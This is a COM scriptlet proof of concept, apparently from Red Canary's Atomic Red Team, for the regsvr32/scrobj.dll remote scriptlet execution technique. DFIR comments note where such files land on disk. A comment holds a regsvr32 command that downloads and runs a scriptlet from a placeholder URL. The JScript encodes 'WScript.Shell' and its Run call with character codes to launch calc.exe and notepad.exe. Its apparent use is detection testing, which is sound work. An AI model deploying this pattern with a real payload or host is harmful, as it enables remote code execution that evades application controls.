<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="2.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
	<!-- DFIR -->
	<!--		.sct files are downloaded and executed from a path like this -->
	<!-- Though, the name and extension are arbitrary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->


	<!-- Proof Of Concept - Casey Smith @subTee -->
        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct -->
	<script language="JScript">
		<![CDATA[
            var _shell = new ActiveXObject(String.fromCharCode(87,83,99,114,105,112,116,46,83,104,101,108,108));
            var _run = String.fromCharCode(82,117,110);
            var _calc = String.fromCharCode(99, 97, 108, 99, 46, 101, 120, 101);
            var _cmd = _shell[_run](_calc);
		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
    function _exec()
    {
        var _shell = new ActiveXObject(String.fromCharCode(87,83,99,114,105,112,116,46,83,104,101,108,108));
        var _run = String.fromCharCode(82,117,110);
        var _notepad = String.fromCharCode(110, 111, 116, 101, 112, 97, 100, 46, 101, 120, 101);
        var _cmd = _shell[_run](_notepad);
    }
]]>
</script>

</scriptlet>
